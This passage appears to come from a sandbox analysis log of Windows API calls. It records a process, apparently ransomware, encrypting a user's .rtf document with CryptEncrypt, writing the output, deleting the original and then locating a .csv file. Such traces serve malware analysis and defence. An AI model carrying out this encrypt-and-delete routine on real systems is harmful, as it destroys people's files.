lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0082.818] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e50 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.818] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2da0 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e60 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.818] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e60 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f20 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f10 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2df0 | out: hHeap=0x1780000) returned 1 [0082.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d60 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0508 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41accc0 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b00 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ed0 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0082.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0082.819] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.819] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.819] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.819] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3aa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0082.821] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0x16ff1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0x17000) returned 1 [0082.821] CharLowerBuffW (in: lpsz="byte[94209]", cchLength=0xb | out: lpsz="byte[94209]") returned 0xb [0082.824] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3d58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0082.825] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144de30*=0x16ff1, dwBufLen=0x17000 | out: pbData=0x48f0048*, pdwDataLen=0x144de30*=0x17000) returned 1 [0082.859] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.861] WriteFile (in: hFile=0x258, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x17000, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144e834*=0x17000, lpOverlapped=0x0) returned 1 [0082.864] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0082.864] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.864] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43c3590, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0082.864] CryptDestroyKey (hKey=0x41ac040) returned 1 [0082.864] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.864] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.864] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.864] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.864] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.865] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.865] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.865] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.865] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0082.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0082.865] CryptReleaseContext (hProv=0x41a4f20, dwFlags=0x0) returned 1 [0082.865] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.865] FreeLibrary (hLibModule=0x756e0000) returned 1 [0082.865] CloseHandle (hObject=0x298) returned 1 [0082.865] CloseHandle (hObject=0x258) returned 1 [0082.874] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\HUjUtG60c TddWcmy.rtf", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\HUjUtG60c TddWcmy.rtf", lpFilePart=0x0) returned 0x5b [0082.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0082.874] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\HUjUtG60c TddWcmy.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\hujutg60c tddwcmy.rtf")) returned 0x20 [0082.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0082.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0082.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0082.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0082.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0082.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0082.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0082.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0082.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0082.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0082.875] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\HUjUtG60c TddWcmy.rtf", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e55450, ftCreationTime.dwHighDateTime=0x1d5f10a, ftLastAccessTime.dwLowDateTime=0x54035490, ftLastAccessTime.dwHighDateTime=0x1d5e6d3, ftLastWriteTime.dwLowDateTime=0x54035490, ftLastWriteTime.dwHighDateTime=0x1d5e6d3, nFileSizeHigh=0x0, nFileSizeLow=0x16ff1, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="HUjUtG60c TddWcmy.rtf", cAlternateFileName="HUJUTG~1.RTF")) returned 0x41ac440 [0082.876] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\HUjUtG60c TddWcmy.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\hujutg60c tddwcmy.rtf")) returned 1 [0082.899] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e55450, ftCreationTime.dwHighDateTime=0x1d5f10a, ftLastAccessTime.dwLowDateTime=0x54035490, ftLastAccessTime.dwHighDateTime=0x1d5e6d3, ftLastWriteTime.dwLowDateTime=0x54035490, ftLastWriteTime.dwHighDateTime=0x1d5e6d3, nFileSizeHigh=0x0, nFileSizeLow=0x16ff1, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="HUjUtG60c TddWcmy.rtf", cAlternateFileName="HUJUTG~1.RTF")) returned 0 [0082.900] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0082.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0082.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0082.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0082.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0082.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0082.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0082.900] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0082.901] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0082.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0082.901] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.901] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0082.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0082.901] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0082.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0082.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a50 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0082.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0082.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x160) returned 0x43ccec8 [0082.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0082.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0082.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caef8 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0082.903] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0082.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0082.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.903] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0082.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0082.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.904] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\kDeOPhXR4D.csv", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49be8ab0, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0xc4079560, ftLastAccessTime.dwHighDateTime=0x1d5e757, ftLastWriteTime.dwLowDateTime=0xc4079560, ftLastWriteTime.dwHighDateTime=0x1d5e757, nFileSizeHigh=0x0, nFileSizeLow=0x10d72, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="kDeOPhXR4D.csv", cAlternateFileName="KDEOPH~1.CSV")) returned 0x41ac500 [0082.904] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0082.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0082.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0082.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0082.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0082.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0082.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0082.904] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0082.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0082.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0082.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a20 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0082.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0082.905] 